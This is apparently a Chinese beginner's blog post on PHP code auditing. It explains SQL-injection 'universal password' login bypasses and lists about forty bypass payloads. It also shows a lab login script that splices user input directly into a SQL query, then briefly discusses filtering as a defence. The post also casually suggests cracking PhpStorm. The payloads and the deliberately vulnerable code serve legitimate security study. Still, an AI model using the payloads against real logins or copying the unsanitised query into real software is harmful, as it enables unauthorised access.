PHP代码审计入门-万能密码入门分析

最新推荐文章于 2024-04-19 20:49:57 发布
最新推荐文章于 2024-04-19 20:49:57 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 代码审计 文章标签: php 网络安全
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/127199943
版权

0x00  写在前面

从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前辈视频学习记录。

本章开始,正式进入代码审计的世界。让me看看曾经让我遥不可及的代码审计能不能慢慢啃下来。

同时,文章还是需要一丢丢些基础的,包括但不限于html、php、mysql和渗透知识。

0x01   代码审计-万能密码

sql三种注释

单行注释

        select user_name from users where user_id;--这时注释

        select user_name from users where user_id;-- 这时注释(要空格)

多行注释

        select user_name from users where user_id;/*这时注释*/

同时,注意注入和sql语法的异同,参考链接如下:

SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master_51CTO博客_sql注入注释

常用的测试万能密码,参考链接如下:

sql注入之万能密码总结 - 腾讯云开发者社区-腾讯云

真正测试的语句并没有这么多,而且现在存在万能密码的站点已经很少见
仅作摘录
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

个人已搭建好环境进行测试,测试时结合代码、抓包和手动调试。篇幅有限,这里仅演示代码。这里使用了phpstorm工具,具体下载及破解可以靠自己解决。

checkUser.php
<?php
/**
 * Created by 流沙
 */

//用户登录
require "./lib/init.php";
header("Content-type:text/html;charset=utf-8");
if(empty($_POST))
{
    //header('Location: register.php');
    echo "登录信息为空";
    header("Refresh:3;url=login.php");
}else{
    if(isset($_POST["user_name"]) && isset($_POST["user_pass"])){      //接收数据,是否设置了user_name、user_pass
        $usename = trim($_POST["user_name"]);       //trim用来去除字符串首尾的空格,此处假如用-- 来注释后有问题的
        $password = trim($_POST["user_pass"]);      //对用户的输入也并没有做任何过滤
        //接收username,user_pass

        $password = md5($password);  //接收到password进行md5加密,所以如果密码进行aa' or 1#是没有用的,因为作了md5加密

        $sql = "select * from users where user_name='$usename' and user_pass='$password'";
        
        /*这里用var_dump输出sql语句,用来调试
            var_dump($sql);
            exit();
        */
        
        $selectSQL = new MySql();    //实例化对象
        $user_data = $selectSQL->getRow($sql);  //跟进getrow,看getrow代码逻辑
            
/*------------------------------------------------------------------------*/
        if($user_data!="")
        {
            session_start();
            $_SESSION["user"] = $user_data["user_name"];
            header("Location: user.php");
        }else{
            echo "用户名或者密码错误!";
            header("Refresh:3;url=login.php");
        }


    }else{
        echo "登录信息不完整";
        header("Refresh:3;url=login.php");
    }


}

为更好理解代码,跟进到getrow,看getrow代码逻辑,发现getrow仅用来返回sql语句

跟进到link,link仅作为数据库连接作用

因万能密码也是较为简单,基本审计思路已经完成。

0x02  防御手段

常用手段是对于用户输入的字符串进行严格过滤,这里代码仅使用了addslashes()用于过滤,其实该函数也是存在绕过风险的,但我们的目的是学习,馒头一口一口吃。

夜已深,今日先到此为止吧。如有错误,欢迎指正。

身高两米不到
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 万能密码,万能用户名和万能密码
weixin_42134554的博客
03-11 969
万能用户名any’ union select * from user – (后面有个注释符)联合查询,是查询的结果大于1,为真万能用户名防御PDO$username=$REQUEST['usernm'];$password=$_REQUEST['passwd'];$pdo=new PDO("mssql:host=127.0.0.1;dbname=users","sa","root");$sql="...
php 万能密码,网络安全系列之十 万能密码登录网站后台
weixin_39969611的博客
03-11 828
在登录网站后台时,有一个比较古老的“万能密码”漏洞,即利用一个我们精心构造的用户名,即使不用输入密码,也可以登录后台,其原理仍属于SQL注入的范畴。假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中用来接收用户所输入的用户名和密码的变量也分别是username和password,当用户在用户验证页面输入用户名和密码后...
万能用户名(密码)原理分析
Have_a_great_day的博客
08-23 590
后端源代码在【.\phpStudy\WWW\cms\admin\login.action.php】中。通过两个例子可知,万能式子是利用后端代码与数据库交互的漏洞,并结合运算符算法,使最后的结果输出为真。将第一条代码输入到用户名,密码随机输入,后端数据库代码将会如下所示。在登录界面,随机输入用户名和密码,后端数据库代码将会如下所示。.】--- 接收前端登录框密码的位置。】--- 接收前端登录框账号的位置。(数据库)相匹配的账号与密码。运算符优先级:and>or。第二十行 --- 搜索与。
SQL注入作业
最新发布
欢迎大家一起成长
04-19 1046
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
PHP万能登陆密码
03-21
PHP万能登陆密码,涵盖了所有的万能类型,值得收藏
php绕过漏洞的函数,PHP中有漏洞的函数总结
weixin_30670053的博客
04-06 658
本篇文章讲述了PHP中存在这一些带有小漏洞的PHP函数,没有了解过PHP中有漏洞函数的可以看看,在实际的PHP开发中用到这些函数时需要注意哪些东西,我们废话少说,一起来看看这篇文章吧!1.弱类型比较2.MD5 compare漏洞PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈...
PHP代码审计入门笔记.rar
04-03
php代码审计
PHP代码审计入门笔记.zip
07-14
PHP代码审计入门笔记
PHP代码审计入门指南1
08-04
PHP代码审计入门指南1】是一本针对初学者的PHP代码审计教程,旨在帮助读者理解和掌握PHP代码审计的基础知识和技巧。本指南不仅涵盖了代码审计的要点,还讲解了漏洞产生的原理和防御方法,旨在提升读者对Web安全的...
PHP代码审计入门实战教程.zip
11-21
目录网盘文件永久链接 第一章:环境准备 第三章:常鬼漏洞 第二章:审计基础
PHP代码审计入门实战视频教程.rar
09-07
讲师结合自身的学习经验,设计了适合代码审计入门指导的课程《PHP代码审计实战》。在本课程中,第一二章系统的讲解代码审计入门的一些基础知识:代码审计环境的准备、代码审计的一般步骤、INI文件的安全配置、一些...
phpweb的文件破解并修复万能密码漏洞
06-23
phpweb的post.php文件破解并修复万能密码漏洞 。绝逼可用
SQL注入之万能密码.docx
06-04
什么是sql注入万能密码?用的语法是什么?用万能密码可以判断网站是否存在注入漏洞,在渗透测试中非常有用
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 2万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
DAY31:代码审计基础( PHP 篇)
qq_49433473的博客
08-15 2294
php代码审计代码审计基础,代码审计思路及工具
代码审计入门
mingyqf的博客
01-16 2306
代码审计入门 前言 最近在看php代码审计,学习下代码审计,看了不少师傅的博客,写的很好,下面不少是借鉴师傅们的,好记性不如烂笔头,记下,以后可以方便查看。 php代码审计需要比较强的代码能力和足够的耐心。这篇文章是写给我这样的刚刚开始审计的菜鸟,下面如果写的哪里有错误的话,还望提出,不吝赐教。 在这里也立个flag:一周至少审计一种CMS(大小不分),希望自己能够坚持下去,任重而道远。 代码审计–准备 1,先放一张大图,php代码审计的几个方向,也是容易出问题的地方,没事的时候可以多看看。 2,代码审计
代码审计 PHP代码理解.
网络安全领域___专研者.
03-21 4053
PHP语言的 概括: (1)PHP 是可以创建动态交互性站点的强有力的服务器端的脚本语言。 (2)PHP可以做很多东西,特别是web网站开发,也可以使用的非常广泛。能够快速,灵活,实用使得PHP语言可以更好的开发任何网站。 (3)PHP 是一种 HTML 嵌入式的脚本语言。php文件以.php结尾。PHP语言的很多语法来自 C,Java 和 Perl,并具有几个 PHP 独有的特点。PHP语言的主要目标是让 Web 开发程序员可以快速的书写动态生成的网页。
跟老韩学php代码审计(一)
老韩讲安全
02-20 123
我们在学习php代码审计之前,需要对php有一定的基础认识,在不要求做框架的代码审计的情况下,我们可以要求自己学习到具有基本的代码阅读能力也是可以(当然如果对自己仅仅只有这个要求,可以说要求有点低。>作为结尾,当然我们也可以省略掉结尾的?变量我们可以理解为存储容器,或者通俗一点来讲,就是将一个东西放到另一个东西里面,比如我需要把数字1放到a数字中,当我们提取a的时候则会提取到1。整数型数据类型种,只能存放整数,如:1、2、3、4、5、6、7、8、9、0等整数数字或-1、-2、-3、-4等负数的整数类型。
万能密码
nielilijy的专栏
09-23 310
万能密码 ' or 1='1 或者 ' or 1='1/* select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真 asp aspx万能密码 1:...
PHP代码审计-php-hash比较缺陷
07-08
嗨!对于PHP代码审计中的php-hash比较缺陷,我可以给你一些相关的信息。在PHP中,使用"=="操作符进行字符串比较时,存在一些问题。这是因为"=="操作符在比较字符串时会进行类型转换,可能导致意外的结果。具体来说,当比较两个字符串时,如果其中一个字符串可以被解释为数字,则会将字符串转换为数字进行比较。 例如,考虑以下代码片段: ```php $hash = "0e12345"; $input = "abc"; if($hash == $input){ echo "Equal"; } else { echo "Not equal"; } ``` 在这个例子中,$hash是一个以"0e"开头的字符串,它会被解释为科学计数法表示的数字。当使用"=="进行比较时,PHP会将$hash转换为数字0,因为科学计数法表示的0e12345等于0。因此,即使$hash和$input不相等,上述代码也会输出"Equal"。 为了避免这种类型转换带来的问题,在PHP中进行字符串比较时,建议使用"==="操作符,它会进行严格的类型和值比较。修改上述代码如下: ```php $hash = "0e12345"; $input = "abc"; if($hash === $input){ echo "Equal"; } else { echo "Not equal"; } ``` 使用"==="操作符进行比较时,$hash和$input的类型

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值